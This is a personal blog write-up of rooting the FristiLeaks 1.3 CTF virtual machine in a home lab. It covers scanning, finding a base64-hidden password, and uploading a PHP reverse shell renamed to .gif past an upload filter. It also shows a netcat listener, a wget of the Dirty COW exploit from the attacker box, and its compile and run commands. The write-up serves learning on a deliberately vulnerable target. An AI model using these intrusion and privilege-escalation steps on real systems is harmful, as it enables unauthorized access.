CTF - FristiLeaks 1.3

Home Blog


Hey guys! Have been searching for some easy VMs for me to pop and found one that states its beginner friendly. Lets get poppin’

RECON

Firstly, I booted the VM alongside my Kali linux machine. Decided to check to see if viewing the VM boot process / login screen gives me an IP address. This would save me scanning for the IP address via subnet with netdiscover

Looks like the IP address is 192.168.56.4. Sweet!

I’ll go ahead and start scanning the ports by typing in nmap -sC -sV -oA fristi 192.168.56.4. This will save all outputs in the directory that I am currently.

After completion, lets cat fristi.nmap to see the contents.

Excellent! So we can see a couple of things:

This tells me that port 80 is open, so I immediatly open up Firefox and browse to this location.

The title says:

Keep calm and fristi

The #fristileaks doesnt actually sent me anywhere, just a google website. Very strange that it doesnt give me anything, I had a look at the source page to see if I could locate anything. I right click and click on view source code

It’s given me instructions on what to do and the ETA of getting root is 4 hours!! I assume I’ll take much more than that..

NIKTO

Couldn’t find anything else, I decide to do a web scan to see if there are any directories I can dig into. I typed in nikto -h 192.168.56.4 > nikto.log. This will pipe the output into nikto.log so I can review.

Once finished, I typed less nikto.log to review the contents

Interesting points:

DIRECTORIES

Lets have a look at those directories. I opened up firefox and browsed to the 3 locations found in my nikto scanner

Its given me a meme that says “This is not the url you were looking for”. This is for all three directories. So what URL am I looking for? I typed in /wp-login /admin and a couple of others but they didn’t work. I managed to type in /fristi and that got me in!

This has given me a username and password section with a picture of Nelson from Simpsons. Could “Ha Ha” be something useful? In this section, I tried different usernames and password but they didn’t work.

I tried:

Lets check out the source code to see if we can find anything interesting.

In this section, The green is commented out. It has a note that is left by someone named eezeepz. This is definitely a username! Also, in the blue, it states that they have used base64 encoding for images.

Scrolling down more, I can see that there is another green section that is commented out. This looks like base64 encoded text. Same as the one blue which is in the first picture. I assume that the Blue correlates to the Nelson picture, but I’m not sure what this green one is.

After some googling, I found out that there is a website that I can decode base64. So I copied the green code and pasted it in the convertor section(Its the first result in google), and clicked on decode.

Its given me a decode.png file to download. I downloaded it and opened.

This looks like a password!! Eggggcellent….

Lets copy and pase the username and password into the section and log in!

Im in!! YASS! Alright, now its given me an upload file. This looks like something I’ve done before in my previous CTFs

Ok — So looks like I can upload an image. Something to take note is the upload.php. Lets upload a Test file to see if it actually uploads.

Ok, so once I uploaded a test image (pepe.jpg), It states that I have completed this. To view the image, I typed in /uploads/pepe.jpg and this is indeed correct. So we know that this is working correct.

From my experience, I can upload a php reverse shell script to the uploads directory. After doing this, I set up a netcat listener on the port I give it. Then I launch the php script by going to /uploads/(FILE NAME) and it should give me a reverse shell on netcat. Lets do that.

REVERSE SHELL

I have already downloaded the php-reverse-shell.php file. I edit this by going to vim php-reverse-shell.php. I edit the IP address so that it reflects to my Kali IP address (192.168.56.5) and any port (8008 lul)

I rename the script extention to .gif because it only allows the extentions such as .jpg, .png and .gif. As you can see, I successfully renamed this to php-reverse-shell.php.gif

Lets upload it now.

I now click on Upload. This has succesfully uploaded. Remember, I have not activated this php script yet. To do this, I will need to browse to the pathway in the URL. But first, lets set up a netcat listener

I type in netcat -nvlp 8008

Alright, now this is set up, lets go to my browser again and execute the script. I went to 192.168.56.4/fristi/uploads/php-reverse-shell.php.gif

I can see that this has executed because it is Connecting… Lets go back to our netcat.

AWESOME! Im in!!! Its given me a shell without TTY. Lets spawn a bash shell instead. I typed in:

import pty; pt.spawn(‘/bin/bash’)

But it gave me an error. So I echo the results and piped into the /tmp folder called asdf.py. From here, I can just execute the python script by typing in python /tmp/asdf.py. I love how you can go through different avenues with linux.

Typing in id gives me the user apache.

DIRTY COW EXPLOIT

I typed in uname -a to see the version of Linux Kernal. I can see that it is using Kernal version 2.6.32

I’ve been really frustrated because I didn’t know how and what to do next. My colleague was suggesting the Dirty Cow exploit as he used this gain Admin access on one of the SAN’s challenges he attended this year. So a bit of googling, I found a Dirty Cow Exploit for the this Kernal Version. Thanks Yair!

Source: https://www.exploit-db.com/exploits/40839/

Firstly, I downloaded this on my Kali box, I renamed it so it doesnt have the extention .c as I had trouble uploading it previously. Also, I moved the exploit to /var/www/html in preparation to to use the wget command

I use wget http://192.168.56.5/exploit to download the exploit from my Kali machine onto the shell.

YES! Things are werkinggg!!

I need to rename it back to the original format so I typed mv exploit exploit.c. After this, I need to compile the exploit. So I typed in gcc -pthread exploit.c -o exploit -lcrypt. FYI, these commands were all in the instructions when I downloaded the exploit. Once this has been completed, I ran the exploit by typing in ./exploit

Great!! So lets type in a new password: cuongpassword

After this, The instructions stated that I can now type in su firefart (That is the username that was default in the script.) IM IN!!!! YES!! This is the first time I used the Dirty Cow exploit! Cant believe its so easy. Really greatful for the people that have developed this!!

After this, I typed in id, and I am definitely ROOT  I cd /root and cat fristileaks_secrets.txt and VIOALLLLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

LESSONS LEARNED

SUMMARY

Took me a very long time to complete this. There were times that I just gave up and closed my laptop and saved it for another day. But I did keep on persisting and trying. I feel really good about this box. Until next time…